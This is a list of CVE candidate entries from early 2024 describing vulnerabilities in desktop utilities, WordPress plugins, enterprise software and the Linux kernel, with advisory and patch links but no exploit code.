CVE 2024 1193 Candidate A vulnerability was found in Navicat 12.0.29. It has been rated as problematic. This issue affects some unknown processing of the component MySQL Conecction Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252683. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://fitoxs.com/vuldb/24-exploit-perl.txt | URL:https://fitoxs.com/vuldb/24-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252683 | URL:https://vuldb.com/?ctiid.252683 | MISC:https://vuldb.com/?id.252683 | URL:https://vuldb.com/?id.252683 Assigned (20240202)
CVE 2024 1192 Candidate A vulnerability was found in South River WebDrive 18.00.5057. It has been declared as problematic. This vulnerability affects unknown code of the component New Secure WebDAV. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-252682 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://fitoxs.com/vuldb/22-exploit-perl.txt | URL:https://fitoxs.com/vuldb/22-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252682 | URL:https://vuldb.com/?ctiid.252682 | MISC:https://vuldb.com/?id.252682 | URL:https://vuldb.com/?id.252682 Assigned (20240202)
CVE 2024 1191 Candidate A vulnerability was found in Hyper CdCatalog 2.3.1. It has been classified as problematic. This affects an unknown part of the component HCF File Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-252681 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://fitoxs.com/vuldb/19-exploit-perl.txt | URL:https://fitoxs.com/vuldb/19-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252681 | URL:https://vuldb.com/?ctiid.252681 | MISC:https://vuldb.com/?id.252681 | URL:https://vuldb.com/?id.252681 Assigned (20240202)
CVE 2024 1190 Candidate A vulnerability was found in Global Scape CuteFTP 9.3.0.3 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument Host/Username/Password leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252680. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://fitoxs.com/vuldb/16-exploit-perl.txt | URL:https://fitoxs.com/vuldb/16-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252680 | URL:https://vuldb.com/?ctiid.252680 | MISC:https://vuldb.com/?id.252680 | URL:https://vuldb.com/?id.252680 Assigned (20240202)
CVE 2024 1189 Candidate A vulnerability has been found in AMPPS 2.7 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Encryption Passphrase Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252679. NOTE: The vendor explains that AMPPS 4.0 is a complete overhaul and the code was re-written. MISC:https://fitoxs.com/vuldb/15-exploit-perl.txt | URL:https://fitoxs.com/vuldb/15-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252679 | URL:https://vuldb.com/?ctiid.252679 | MISC:https://vuldb.com/?id.252679 | URL:https://vuldb.com/?id.252679 Assigned (20240202)
CVE 2024 1188 Candidate A vulnerability, which was classified as problematic, was found in Rizone Soft Notepad3 1.0.2.350. Affected is an unknown function of the component Encryption Passphrase Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-252678 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://fitoxs.com/vuldb/14-exploit-perl.txt | URL:https://fitoxs.com/vuldb/14-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252678 | URL:https://vuldb.com/?ctiid.252678 | MISC:https://vuldb.com/?id.252678 | URL:https://vuldb.com/?id.252678 Assigned (20240202)
CVE 2024 1187 Candidate A vulnerability, which was classified as problematic, has been found in Munsoft Easy Outlook Express Recovery 2.0. This issue affects some unknown processing of the component Registration Key Handler. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252677 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://fitoxs.com/vuldb/13-exploit-perl.txt | URL:https://fitoxs.com/vuldb/13-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252677 | URL:https://vuldb.com/?ctiid.252677 | MISC:https://vuldb.com/?id.252677 | URL:https://vuldb.com/?id.252677 Assigned (20240202)
CVE 2024 1186 Candidate A vulnerability classified as problematic was found in Munsoft Easy Archive Recovery 2.0. This vulnerability affects unknown code of the component Registration Key Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252676. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://fitoxs.com/vuldb/12-exploit-perl.txt | URL:https://fitoxs.com/vuldb/12-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252676 | URL:https://vuldb.com/?ctiid.252676 | MISC:https://vuldb.com/?id.252676 | URL:https://vuldb.com/?id.252676 | MISC:https://www.exploit-db.com/exploits/45884 | URL:https://www.exploit-db.com/exploits/45884 Assigned (20240202)
CVE 2024 1185 Candidate A vulnerability classified as problematic has been found in Nsasoft NBMonitor Network Bandwidth Monitor 1.6.5.0. This affects an unknown part of the component Registration Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252675. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://fitoxs.com/vuldb/11-exploit-perl.txt | URL:https://fitoxs.com/vuldb/11-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252675 | URL:https://vuldb.com/?ctiid.252675 | MISC:https://vuldb.com/?id.252675 | URL:https://vuldb.com/?id.252675 Assigned (20240202)
CVE 2024 1184 Candidate A vulnerability was found in Nsasoft Network Sleuth 3.0.0.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-252674 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://fitoxs.com/vuldb/10-exploit-perl.txt | URL:https://fitoxs.com/vuldb/10-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252674 | URL:https://vuldb.com/?ctiid.252674 | MISC:https://vuldb.com/?id.252674 | URL:https://vuldb.com/?id.252674 Assigned (20240202)
CVE 2024 1181 Candidate The Coming Soon, Under Construction & Maintenance Mode By Dazzler plugin for WordPress is vulnerable to maintenance mode bypass in all versions up to, and including, 2.1.2. This is due to the plugin relying on the REQUEST_URI to determine if the page being accesses is an admin area. This makes it possible for unauthenticated attackers to bypass maintenance mode and access the site which may be considered confidential when in maintenance mode. MISC:https://plugins.trac.wordpress.org/browser/coming-soon-wp/trunk/coming-soon-wp.php#L45 | URL:https://plugins.trac.wordpress.org/browser/coming-soon-wp/trunk/coming-soon-wp.php#L45 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc144cd-7119-477f-9fa1-b00cab215077?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc144cd-7119-477f-9fa1-b00cab215077?source=cve Assigned (20240201)
CVE 2024 1178 Candidate The SportsPress – Sports Club & League Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings_save() function in all versions up to, and including, 2.7.17. This makes it possible for unauthenticated attackers to update the permalink structure for the clubs MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043889%40sportspress&new=3043889%40sportspress&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043889%40sportspress&new=3043889%40sportspress&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/098dfee2-ba0b-420f-89ed-8ad1e41faec4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/098dfee2-ba0b-420f-89ed-8ad1e41faec4?source=cve Assigned (20240201)
CVE 2024 1177 Candidate The WP Club Manager – WordPress Sports Club Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings_save() function in all versions up to, and including, 2.2.10. This makes it possible for unauthenticated attackers to update the permalink structure for the clubs MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030843%40wp-club-manager&new=3030843%40wp-club-manager&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030843%40wp-club-manager&new=3030843%40wp-club-manager&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/64c2c8c2-58f5-4b7d-b226-39ba39e887d5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/64c2c8c2-58f5-4b7d-b226-39ba39e887d5?source=cve Assigned (20240201)
CVE 2024 1176 Candidate The HT Easy GA4 – Google Analytics WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the login() function in all versions up to, and including, 1.1.5. This makes it possible for unauthenticated attackers to update the email associated through the plugin with GA4. MISC:https://plugins.trac.wordpress.org/browser/ht-easy-google-analytics/trunk/includes/class.ht-easy-ga4.php#L99 | URL:https://plugins.trac.wordpress.org/browser/ht-easy-google-analytics/trunk/includes/class.ht-easy-ga4.php#L99 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/10e1b3ac-f002-4108-9682-5fe300f07adb?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/10e1b3ac-f002-4108-9682-5fe300f07adb?source=cve Assigned (20240201)
CVE 2024 1174 Candidate Previous versions of HP ThinPro (prior to HP ThinPro 8.0 SP 8) could potentially contain security vulnerabilities. HP has released HP ThinPro 8.0 SP 8, which includes updates to mitigate potential vulnerabilities. MISC:https://support.hp.com/us-en/document/ish_10232639-10232671-16/hpsbhf03919 | URL:https://support.hp.com/us-en/document/ish_10232639-10232671-16/hpsbhf03919 Assigned (20240201)
CVE 2024 1172 Candidate The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion widget in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.7/includes/Elements/Adv_Accordion.php#L1227 | URL:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.7/includes/Elements/Adv_Accordion.php#L1227 | MISC:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.7/includes/Elements/Adv_Accordion.php#L1292 | URL:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.7/includes/Elements/Adv_Accordion.php#L1292 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f2ff2cc6-b584-442b-890b-033a0a047c24?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f2ff2cc6-b584-442b-890b-033a0a047c24?source=cve Assigned (20240201)
CVE 2024 1171 Candidate The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery Widget in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3034127/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php | URL:https://plugins.trac.wordpress.org/changeset/3034127/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fafdd087-9637-41df-bc5a-97e1a02ea744?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fafdd087-9637-41df-bc5a-97e1a02ea744?source=cve Assigned (20240201)
CVE 2024 1170 Candidate The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized media file deletion due to a missing capability check on the handle_deleted_media function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to delete arbitrary media files. MISC:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/functions.php#L1493 | URL:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/functions.php#L1493 | MISC:https://plugins.trac.wordpress.org/changeset/3046092/buddyforms/trunk?contextall=1&old=3031945&old_path=%2Fbuddyforms%2Ftrunk#file7 | URL:https://plugins.trac.wordpress.org/changeset/3046092/buddyforms/trunk?contextall=1&old=3031945&old_path=%2Fbuddyforms%2Ftrunk#file7 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/380c646c-fd95-408a-89eb-3e646768bbc5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/380c646c-fd95-408a-89eb-3e646768bbc5?source=cve Assigned (20240201)
CVE 2024 1169 Candidate The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized media upload due to a missing capability check on the buddyforms_upload_handle_dropped_media function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to upload media files. MISC:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/functions.php#L1466 | URL:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/functions.php#L1466 | MISC:https://plugins.trac.wordpress.org/changeset/3046092/buddyforms/trunk/includes/functions.php?contextall=1&old=3023795&old_path=%2Fbuddyforms%2Ftrunk%2Fincludes%2Ffunctions.php | URL:https://plugins.trac.wordpress.org/changeset/3046092/buddyforms/trunk/includes/functions.php?contextall=1&old=3023795&old_path=%2Fbuddyforms%2Ftrunk%2Fincludes%2Ffunctions.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6d14a90d-65ea-45da-956b-0735e2e2b538?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6d14a90d-65ea-45da-956b-0735e2e2b538?source=cve Assigned (20240201)
CVE 2024 1167 Candidate When SEW-EURODRIVE MOVITOOLS MotionStudio processes XML information unrestricted file access can occur. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-016-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-016-01 | MISC:https://www.seweurodrive.com/contact_us/contact_us.html | URL:https://www.seweurodrive.com/contact_us/contact_us.html Assigned (20240201)
CVE 2024 1165 Candidate The Brizy – Page Builder plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4.39 via the 'id'. This makes it possible for authenticated attackers, with contributor-level access and above, to upload files to arbitrary locations on the server MISC:https://plugins.trac.wordpress.org/browser/brizy/tags/2.4.39/editor/screenshot/manager.php#L33 | URL:https://plugins.trac.wordpress.org/browser/brizy/tags/2.4.39/editor/screenshot/manager.php#L33 | MISC:https://plugins.trac.wordpress.org/changeset/3034945/brizy/tags/2.4.41/editor/screenshot/manager.php | URL:https://plugins.trac.wordpress.org/changeset/3034945/brizy/tags/2.4.41/editor/screenshot/manager.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7673b2ba-5d7a-4ae9-92e7-1a910687fdb8?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7673b2ba-5d7a-4ae9-92e7-1a910687fdb8?source=cve Assigned (20240201)
CVE 2024 1163 Candidate Uncontrolled Resource Consumption in GitHub repository mbloch/mapshaper prior to 0.6.44. MISC:https://github.com/mbloch/mapshaper/commit/7437d903c0a87802c3751fc529d2de7098094c72 | URL:https://github.com/mbloch/mapshaper/commit/7437d903c0a87802c3751fc529d2de7098094c72 | MISC:https://huntr.com/bounties/c1cbc18b-e4ab-4332-ad13-0033f0f976f5 | URL:https://huntr.com/bounties/c1cbc18b-e4ab-4332-ad13-0033f0f976f5 Assigned (20240201)
CVE 2024 1162 Candidate The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.10.29. This is due to missing or incorrect nonce validation on the register_reference() function. This makes it possible for unauthenticated attackers to update the connected API keys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030173%40themeisle-companion&new=3030173%40themeisle-companion&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030173%40themeisle-companion&new=3030173%40themeisle-companion&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/88f6a24f-f14a-4d0a-be5a-f8c84910b4fc?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/88f6a24f-f14a-4d0a-be5a-f8c84910b4fc?source=cve Assigned (20240201)
CVE 2024 1160 Candidate The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon Link in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/818d3418-8e14-49b9-a112-8eab9eb3c283?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/818d3418-8e14-49b9-a112-8eab9eb3c283?source=cve Assigned (20240201)
CVE 2024 1159 Candidate The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e71386ea-0546-4aa7-b77a-e1824e80accc?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e71386ea-0546-4aa7-b77a-e1824e80accc?source=cve Assigned (20240201)
CVE 2024 1158 Candidate The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the buddyforms_new_page function in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber access or higher, to create pages with arbitrary titles. These pages are published. MISC:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/admin/admin-ajax.php?rev=2820257#L80 | URL:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/admin/admin-ajax.php?rev=2820257#L80 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3046092%40buddyforms%2Ftrunk&old=3031945%40buddyforms%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3046092%40buddyforms%2Ftrunk&old=3031945%40buddyforms%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/198cb3bb-73fe-45ae-b8e0-b7ee8dda9547?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/198cb3bb-73fe-45ae-b8e0-b7ee8dda9547?source=cve Assigned (20240201)
CVE 2024 1157 Candidate The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's button URL in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/bold-page-builder/trunk/content_elements/bt_bb_button/bt_bb_button.php#L161 | URL:https://plugins.trac.wordpress.org/browser/bold-page-builder/trunk/content_elements/bt_bb_button/bt_bb_button.php#L161 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e166a7db-45f7-4a0d-9966-dbec9ade204a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e166a7db-45f7-4a0d-9966-dbec9ade204a?source=cve Assigned (20240201)
CVE 2024 1156 Candidate Incorrect directory permissions for the shared NI RabbitMQ service may allow a local authenticated user to read RabbitMQ configuration information and potentially enable escalation of privileges. MISC:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/incorrect-permissions-for-shared-systemlink-elixir-based-service.html | URL:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/incorrect-permissions-for-shared-systemlink-elixir-based-service.html Assigned (20240201)
CVE 2024 1155 Candidate Incorrect permissions in the installation directories for shared SystemLink Elixir based services may allow an authenticated user to potentially enable escalation of privilege via local access. MISC:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/incorrect-permissions-for-shared-systemlink-elixir-based-service.html | URL:https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/incorrect-permissions-for-shared-systemlink-elixir-based-service.html Assigned (20240201)
CVE 2024 1151 Candidate A vulnerability was reported in the Open vSwitch sub-component in the Linux Kernel. The flaw occurs when a recursive operation of code push recursively calls into the code block. The OVS module does not validate the stack depth, pushing too many frames and causing a stack overflow. As a result, this can lead to a crash or other related issues. FEDORA:FEDORA-2024-88847bc77a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GS7S3XLTLOUKBXV67LLFZWB3YVFJZHRK/ | FEDORA:FEDORA-2024-987089eca2 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3LZROQAX7Q7LEP4F7WQ3KUZKWCZGFFP2/ | MISC:RHBZ#2262241 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2262241 | MISC:https://access.redhat.com/security/cve/CVE-2024-1151 | URL:https://access.redhat.com/security/cve/CVE-2024-1151 | MISC:https://lore.kernel.org/all/20240207132416.1488485-1-aconole@redhat.com/ | URL:https://lore.kernel.org/all/20240207132416.1488485-1-aconole@redhat.com/ Assigned (20240201)
CVE 2024 1150 Candidate Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on Unix allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 7.3.1. MISC:https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK | URL:https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK Assigned (20240201)
CVE 2024 1149 Candidate Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on MacOS, Snow Software Inventory Agent on Windows, Snow Software Inventory Agent on Linux allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 6.12.0; Inventory Agent: through 6.14.5; Inventory Agent: through 6.7.2. MISC:https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK | URL:https://community.snowsoftware.com/s/feed/0D5Td000004YtMcKAK Assigned (20240201)
CVE 2024 1148 Candidate Weak access control in OpenText PVCS Version Manager allows potential bypassing of authentication and uploading of files. MISC:https://portal.microfocus.com/s/article/KM000026669 | URL:https://portal.microfocus.com/s/article/KM000026669 Assigned (20240201)
CVE 2024 1147 Candidate Weak access control in OpenText PVCS Version Manager allows potential bypassing of authentication and download of files. MISC:https://portal.microfocus.com/s/article/KM000026669 | URL:https://portal.microfocus.com/s/article/KM000026669 Assigned (20240201)
CVE 2024 1146 Candidate Cross-Site Scripting vulnerability in Devklan's Alma Blog that affects versions 2.1.10 and earlier. This vulnerability could allow an attacker to store a malicious JavaScript payload within the application by adding the payload to 'Community Description' or 'Community Rules'. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog Assigned (20240201)
CVE 2024 1145 Candidate User enumeration vulnerability in Devklan's Alma Blog that affects versions 2.1.10 and earlier. This vulnerability could allow a remote user to retrieve all valid users registered in the application just by looking at the request response. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog Assigned (20240201)
CVE 2024 1144 Candidate Improper access control vulnerability in Devklan's Alma Blog that affects versions 2.1.10 and earlier. This vulnerability could allow an unauthenticated user to access the application's functionalities without the need for credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alma-devklan-blog Assigned (20240201)
CVE 2024 1143 Candidate Central Dogma versions prior to 0.64.1 is vulnerable to Cross-Site Scripting (XSS), which could allow for the leakage of user sessions and subsequent authentication bypass. MISC:https://github.com/line/centraldogma/security/advisories/GHSA-34q3-p352-c7q8 | URL:https://github.com/line/centraldogma/security/advisories/GHSA-34q3-p352-c7q8 Assigned (20240201)
CVE 2024 1142 Candidate Path Traversal in Sonatype IQ Server from version 143 allows remote authenticated attackers to overwrite or delete files via a specially crafted request. Version 171 fixes this issue. MISC:https://support.sonatype.com/hc/en-us/articles/27034479038739-CVE-2024-1142-Sonatype-IQ-Server-Path-Traversal-2024-03-06 | URL:https://support.sonatype.com/hc/en-us/articles/27034479038739-CVE-2024-1142-Sonatype-IQ-Server-Path-Traversal-2024-03-06 Assigned (20240201)
CVE 2024 1141 Candidate A vulnerability was found in python-glance-store. The issue occurs when the package logs the access_key for the glance-store when the DEBUG log level is enabled. MISC:RHBZ#2258836 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258836 | MISC:https://access.redhat.com/security/cve/CVE-2024-1141 | URL:https://access.redhat.com/security/cve/CVE-2024-1141 Assigned (20240201)
CVE 2024 1140 Candidate Twister Antivirus v8.17 is vulnerable to an Out-of-bounds Read vulnerability by triggering the 0x801120B8 IOCTL code of the filmfd.sys driver. MISC:http://www.filseclab.com/en-us/products/twister.htm | URL:http://www.filseclab.com/en-us/products/twister.htm | MISC:https://fluidattacks.com/advisories/fitzgerald/ | URL:https://fluidattacks.com/advisories/fitzgerald/ Assigned (20240131)
CVE 2024 1138 Candidate The FTL Server component of TIBCO Software Inc.'s TIBCO FTL - Enterprise Edition contains a vulnerability that allows a low privileged attacker with network access to execute a privilege escalation on the affected ftlserver. Affected releases are TIBCO Software Inc.'s TIBCO FTL - Enterprise Edition: versions 6.10.1 and below. MISC:https://community.tibco.com/advisories/tibco-security-advisory-march-12-2024-tibco-ftl-cve-2024-1138-r207/ | URL:https://community.tibco.com/advisories/tibco-security-advisory-march-12-2024-tibco-ftl-cve-2024-1138-r207/ Assigned (20240131)
CVE 2024 1137 Candidate The Proxy and Client components of TIBCO Software Inc.'s TIBCO ActiveSpaces - Enterprise Edition contain a vulnerability that theoretically allows an Active Spaces client to passively observe data traffic to other clients. Affected releases are TIBCO Software Inc.'s TIBCO ActiveSpaces - Enterprise Edition: versions 4.4.0 through 4.9.0. MISC:https://community.tibco.com/advisories/tibco-security-advisory-march-12-2024-tibco-activespaces-cve-2024-1137-r208/ | URL:https://community.tibco.com/advisories/tibco-security-advisory-march-12-2024-tibco-activespaces-cve-2024-1137-r208/ Assigned (20240131)
CVE 2024 1136 Candidate The Coming Soon Page & Maintenance Mode plugin for WordPress is vulnerable to unauthorized access of data due to an improperly implemented URL check in the wpsm_coming_soon_redirect function in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to view a site with maintenance mode or coming-soon mode enabled to view the site's content. MISC:https://plugins.trac.wordpress.org/browser/responsive-coming-soon/trunk/redirect.php#L11 | URL:https://plugins.trac.wordpress.org/browser/responsive-coming-soon/trunk/redirect.php#L11 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e3c52d6e-b3f4-4ba8-aee4-b9f11704e1de?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e3c52d6e-b3f4-4ba8-aee4-b9f11704e1de?source=cve Assigned (20240131)
